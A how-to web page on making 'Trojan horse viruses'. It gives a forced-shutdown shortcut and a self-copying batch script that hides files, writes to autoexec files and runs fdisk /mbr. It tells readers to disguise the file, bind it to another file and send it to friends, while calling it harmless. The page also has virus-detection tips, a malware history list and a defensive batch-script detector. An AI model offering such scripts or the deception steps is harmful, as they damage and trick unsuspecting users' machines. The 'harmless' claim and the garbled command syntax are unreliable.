
How to Create a Trojan Horse

Create A Trojan Horse Virus


How do you make a Trojan horse virus? Strictly speaking, a Trojan horse is not a virus; it is malware, although people generally call it a virus. I will teach you how to make a Trojan horse virus in 3 minutes. You can send this virus to your friends; it will not harm their computer, but it will shut the computer down immediately. So let's start creating a Trojan horse virus.

First go to your desktop, right-click, and choose to create a new shortcut. A new shortcut icon will appear in your window.

In the location, type what I type:
-s -t(# of seconds until shutdown.es:50)"(Any message of your choice.Example:Trojan Horse Acitivate)"

Name the file whatever you want to call it.

After doing all this, your Trojan horse virus is ready to use. Remember, it will not harm your or your friend's computer; it will just shut it down.

To give your virus an extremely good look and make your friend wonder about his computer, choose an appropriate icon for it. Then your virus is ready to use; send it to your friend in any way.

Detect a virus without an antivirus

  • Do nothing and watch your network connection. Viruses, spyware and worms try to do their work silently and leave as few traces as possible, but their activity can still be detected in a simple way. If you are connected to the internet, or to a network that is connected to the internet, do nothing on your computer and watch the network connection. If it shows data being sent and received all the time, your computer may be infected. Make sure you are not doing anything else on the computer while you watch.
    If you cannot see the network connection, click Start -> Settings -> Control Panel -> Network Connections. The icon with two monitors blinks whenever data is being sent or received.
  • Next, check the speed and compare. Step 1 alone may not tell you whether your PC is infected, but you know how fast your PC normally is. Is it much slower or only a bit slower? If it is much slower than before, it is more likely that your PC has been infected.
  • Check your antivirus status. Most of the smart viruses are able to shut down the antivirus process and then freely take over your PC, installing and duplicating themselves or calling in other malware. Do not be surprised if the PC then ends up loaded with viruses, spyware and their companions. So if your antivirus is not active, be suspicious. Shutting down the antivirus is usually done by a virus, not by a worm or spyware.
  • Check your MSCONFIG.
    When a virus, worm or spyware infects a PC, it sets itself to run automatically when Windows starts. You can check which applications start with your PC: click Start > Run, type “msconfig” and press Enter. In the window that opens, go to the Startup tab and check the applications one by one. Their names are usually similar to the name of the application they belong to, for example qt.exe for QuickTime. If you suspect that one of them is a virus, uncheck it and reboot. If your computer behaves better, that file may be the virus or spyware; rename it to *.bak. But viruses are smart: if the entry is checked again after you restart the computer, you will have to keep working against it, and the war is not over yet.
  • Remember the history.
    “Please help, my computer has gone wild since two days ago” is, for me, a helpful statement for finding a virus. It may point to the date on which the computer was infected, which means that a new file containing the virus was created on that day. So let's search and destroy: click Start -> Search -> For Files or Folders.
    In the search area you will find an unchecked Date option; check it. Choose the files-created option and fill in the date on which your computer started misbehaving.
    This is a reasonably good way to detect a virus. You will get a list of the files created on that day, and because the list is short it is easy to go through. Next, pick out the executable files, which have the extensions *.exe, *.bat and *.pif. Usually the same file also appears in the Startup tab (see the MSCONFIG check above).
    Suspect any file that meets these conditions, and make sure it does not belong to one of your applications such as MS Word or Excel. You can rename it to *.bak and restart.
  • Ask Mr. Google what the file is.
    If you are still not sure, go online, type the file name into google.com or yahoo.com and add “virus” after it. If the results say that the file is a virus, you can delete or rename it.
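
The date-based search from the "Remember the history" step, as an added example that is not part of the original post: it walks a folder and lists the *.exe, *.bat and *.pif files created on a given day, putting names that also appear in a Startup list first. The function names and the `startup_names` and `when` parameters are assumptions of this example; where the platform exposes no creation time it falls back to the modification time.

```python
import os
import tempfile
from datetime import date, datetime
from pathlib import Path

SUSPECT_EXTS = {".exe", ".bat", ".pif"}   # extensions named in the article

def created_on(st):
    """Best available creation date for an os.stat() result."""
    birth = getattr(st, "st_birthtime", None)   # present on Windows (3.12+), macOS, BSD
    if birth is not None:
        ts = birth
    elif os.name == "nt":
        ts = st.st_ctime                          # creation time on Windows
    else:
        ts = st.st_mtime                          # assumption: no birth time, use mtime
    return datetime.fromtimestamp(ts).date()

def executables_created_on(root, day, startup_names=(), when=created_on):
    """Return [(path, in_startup)] for suspect files dated `day` under `root`.

    startup_names: file names copied by hand from the msconfig Startup tab.
    when: function mapping a stat result to a date (hypothetical hook for testing).
    """
    startup = {n.lower() for n in startup_names}
    hits = []
    for dirpath, _dirs, files in os.walk(root):   # unreadable folders are skipped
        for name in files:
            path = Path(dirpath, name)
            if path.suffix.lower() not in SUSPECT_EXTS:
                continue
            try:
                st = path.stat()
            except OSError:
                continue                          # file vanished or access denied
            if when(st) == day:
                hits.append((str(path), name.lower() in startup))
    # Files that also appear in the Startup list sort first.
    return sorted(hits, key=lambda h: (not h[1], h[0]))

if __name__ == "__main__":
    with tempfile.TemporaryDirectory() as d:      # constructed sample tree
        for n in ("qt.exe", "setup.bat", "notes.txt"):
            Path(d, n).write_bytes(b"")
        for path, in_startup in executables_created_on(d, date.today(), ["qt.exe"]):
            print("STARTUP" if in_startup else "       ", path)
```

A hit is only a candidate for the checks in the remaining steps; installers and updates also create executables on any given day.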

Top ten most dangerous virus

1. Sadmind worm (2001)
The Sadmind worm was a self-propagating piece of malware. It was first discovered on May 8, 2001 in China. The sadmind program the worm is named after is designed to provide remote system administration operations and is installed by default with many versions of the Sun Microsystems operating system.
It affected major platforms: the Sun Microsystems Solaris operating system and Microsoft's Internet Information Services (IIS), which is the world's second most popular web server in terms of overall websites, behind the industry leader Apache HTTP Server.

2. Beast Trojan (2002)
Beast is a Windows-based backdoor trojan horse more commonly known in the underground cracker community as a RAT (Remote Administration Tool). It was created in Delphi and released first by its author Tataye in 2002. Beast was one of the first trojans to feature a 'reverse connection' to its victims and once established, it gave the attacker complete control over the infected computer.

Once connected to the victim's computer via Beast, the hacker can access all of the victim's files and directories, along with the power to upload, download, delete or execute any file or folder.

3. SQL Slammer (2003)
It first appeared on 27 January 2003 and soon ranked high on the list of the most dangerous worms of the year, because it is the first fileless worm. Slammer was able to spread by taking advantage of a vulnerability found in SQL Server.
Slammer spread to over 90 percent of all vulnerable hosts in 10 minutes and infected around 359,000 computers in total. According to a London-based market intelligence firm, the worm caused between $950 million and $1.2 billion in lost productivity worldwide in its first five days.

4. Sasser (2004)
Sasser is an Internet worm that probably caused around $18.1 billion of damage in 2004. It was created by a computer science student, Sven Jaschan, in Germany and was first seen on the last day of April. While it had no intentionally destructive payload, Sasser did cause many computers to slow down or crash, causing some high-profile damage.
It was destructive enough to shut down the satellite communications of some French news agencies. It also resulted in the cancellation of several Delta airline flights and the shutdown of numerous companies' systems worldwide.

5. Bandook (2005)
Bandook RAT is a backdoor trojan horse that infects Windows NT family systems (Windows 2000, XP, 2003, Vista). It uses a server creator, a client and a server to take control of the remote computer. It uses process hijacking / kernel patching to bypass the firewall and allow the server component to hijack processes and gain rights for accessing the internet. It is very similar to the Beast Trojan (2002).


6. Nyxem (2006)
ALIAS: Mywife, Hunchi, I-Worm.Nyxem, Blackmal, Blueworm, Blackworm
The Nyxem worm was first found in March 2006. The worm spreads in e-mails using an external SMTP engine. It sends itself with different subjects, body text and attachment names. The worm also copies itself multiple times to an infected hard drive. Blackworm is designed to corrupt data on infected computers on February 3, 2006, in respect to The Day the Music Died.

The scariest thing about this worm is that it can delete your antivirus programs if they are installed in the same directories as the ones specified in the worm's code. It can also delete the entries in the Windows Registry belonging to these antivirus programs, so these applications will not run automatically the next time Windows is started.
The worm also contains a GIF file which is used to make the recipient of an infected e-mail think that the message was scanned by Norton Anti-Virus and no infection was found.

But its havoc ended soon, and it dropped off the records after October 26.

7. Storm Worm (2007)
ALIAS: Small.dam, Trojan.Peacomm, Trojan.Peed, Trojan.Tibs, W32/Zhelatin
Soon after Nyxem ended, a new virus named Storm Worm was discovered on January 17, 2007, with the same functionality as Nyxem. It hides itself in e-mail attachments with the following subject line: "230 dead as storm batters Europe." Users who opened the attachment let the virus onto their machines. This virus infected around 10 million computers worldwide, and once a computer is infected it can be used to send millions of spam e-mails advertising web links.
It also has some new features for stealing identities, and according to the United States Federal Bureau of Investigation, Storm greatly helped hackers commit bank fraud, identity theft and a number of other cybercrimes.

8. Conficker (2008)
Conficker is a computer worm targeting the Microsoft Windows operating system. It was first detected on 20 November 2008 and affected more than seven million government, business and home computers in over 200 countries.
First, the worm attacks the Microsoft vulnerability MS08-067 in the Server service, which allows remote code execution: a remote attacker can run arbitrary code on the machine without authentication and take full control of the computer. Second, Conficker uses the infected machine's computing power to run password brute-force attacks against administrator passwords in the local network, which allows the worm to spread through network shares as well.
The worm is said to have caused 9.1 billion in damage, mostly in Asia, South America and Europe.
New versions of Conficker came with the power to:
- Block DNS lookups.
- Disable AutoUpdate.
- Kill anti-malware.
- Scan for and terminate processes with names of anti-malware, patch or diagnostic utilities at one-second intervals.
Microsoft set a bounty of $250,000 USD for information leading to the capture of the worm's author(s).

9. Daprosy Worm (2009)
Daprosy was first observed in early May 2009 and first announced to the public as the Daprosy trojan worm by Symantec in July 2009. This worm is a malicious computer program that spreads via LAN connections, spammed e-mails and USB mass storage devices. Infection comes from a single read1st.exe file, from which several dozen clones are created at once, bearing the names of compromised folders. The most obvious symptom of Daprosy infection is the presence of Classified.exe or Do not open - secrets!.exe files in infected folders.
The worm is known to destabilize, corrupt and even stall the operating system due to programming bugs. It appears to be incomplete and was probably created by students or amateur Visual Basic programmers. As of October 2009 special scripts are available to remove it from infected computers, but until then many Windows systems were stalled.

10. Alureon (2010)
Alureon is a trojan and rootkit designed to steal data by intercepting a system's network traffic and searching it for usernames, passwords and credit card data. Microsoft has confirmed that Alureon is the cause of a series of BSoD problems on Windows systems which were triggered by the Patch Tuesday update MS10-015. Microsoft will not install the patch on these systems. The Alureon rootkit was first seen in 2006 and has now started affecting computers.
PCs become infected by downloading software, particularly from torrent sites, and by visiting certain posting sites.

How to create a virus


  • Understand the following: it’s just a harmless “virus”. It only prints some scary messages and finally shuts down the computer. When you start the computer again, it will work as it did before!
  • Read the virus: below you see the computer code that is executed when you start the virus. The lines that start with REM are comments that the computer ignores. They explain what the line above does.
@echo off
title %0
rem conditional check.
echo welcome to this wonderful program! please wait while I delete all your files!
rem infection of the user
copy %0 c:tmp.bat >null attrib +r +s +h c:tmp.bat echo for %%i in (*.bat) do copy c:tmp.bat+%%i %%i >>c:windowssystem32autoexec.NT
echo echo virus detected! >>c:windowssystem32autoexec.NT
echo pause >>c:windowssystem32autoexec.NT
echo NT core:infected!
echo echo shame on you! >>c:autoexec.bat
echo echo system hault-virus identified! >>c:autoexec.bat
echo chkdsk >>c:autoexec.bat
echo i t i s t o o l a t e, y o u h a v e a v i r u s, n o w u r l i f e i s n o t b e a u t i f u l
fdisk /mbr
shutdown -s -t 03 -c “windows has shut down because the lsass service has incountered a write fault at 0×00000000000000000000000000000000000″
Code Details
@echo off
color 1a (Changes the colour)
echo (Displays a text)
echo: (leaves a line)
ping -n 2 127.0.0.1>nul (pings your localhost – nothing much)
shutdown.exe (shutdown)
  1. Read and understand the warnings!
  2. Open up Notepad in Windows. You can do this by navigating to Start > Programs > Accessories > Notepad, or simply by entering notepad under Start > Run.
  3. Copy and Paste the Code of the “virus” into Notepad
  4. Click File -> Save as
  5. Decide on a location to save the fake virus. You should choose a location where the user won’t find the file, so saving it on the desktop would be a bad idea!
  6. Change “.txt” to “All files” in the file type drop-down menu.
  7. Choose a harmless filename. Replace the “.txt” at the end with “.bat”.
  8. Click on save and close Notepad.
Now we have completed making the virus, and we must bind the virus with any other file.

After binding the file, just send this file to your friends. Then you can just sit back and enjoy the show!
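
A defender's static check for the behaviours in the shortcut command and the batch listing above, as an added example that is not part of the original post: it reads a script's text and flags forced shutdowns, hidden-attribute changes, writes to autoexec files, fdisk /mbr and self-copying, which are the actions the listing performs beyond printing messages. The rule names, the patterns and the SAMPLE text are constructed for this example.

```python
import re

# Behaviours taken from the page's shortcut and batch listing; the patterns
# themselves are this example's own and are not a complete rule set.
RULES = [
    ("forced-shutdown", re.compile(r"\bshutdown(\.exe)?\b.*\s[-/]s\b", re.I)),
    ("hide-file",       re.compile(r"\battrib\b.*\+h\b", re.I)),
    ("autoexec-write",  re.compile(r">>?\s*\S*autoexec\.(bat|nt)\b", re.I)),
    ("mbr-rewrite",     re.compile(r"\bfdisk\b.*/mbr\b", re.I)),
    ("self-copy",       re.compile(r"\bcopy\b.*%0", re.I)),
]

def triage(script_text):
    """Return [(line_no, rule_name, line)] for every rule hit in a batch script."""
    findings = []
    for no, raw in enumerate(script_text.splitlines(), 1):
        line = raw.strip().lstrip("@")
        low = line.lower()
        if low == "rem" or low.startswith(("rem ", "::")):
            continue                      # comment line, never executed
        if low.startswith("echo") and ">" not in line:
            continue                      # only prints text, runs nothing
        for name, rx in RULES:
            if rx.search(line):
                findings.append((no, name, line))
    return findings

# Constructed sample: lines 2 and 3 mention a shutdown but do not run one.
SAMPLE = r'''@echo off
rem shutdown -s in a comment is ignored
echo shutdown -s is only printed here
attrib +r +s +h C:\tmp.bat
echo echo hello >>C:\autoexec.bat
shutdown -s -t 30 -c "constructed message"
'''

if __name__ == "__main__":
    for no, name, line in triage(SAMPLE):
        print(f"line {no}: {name}: {line}")
```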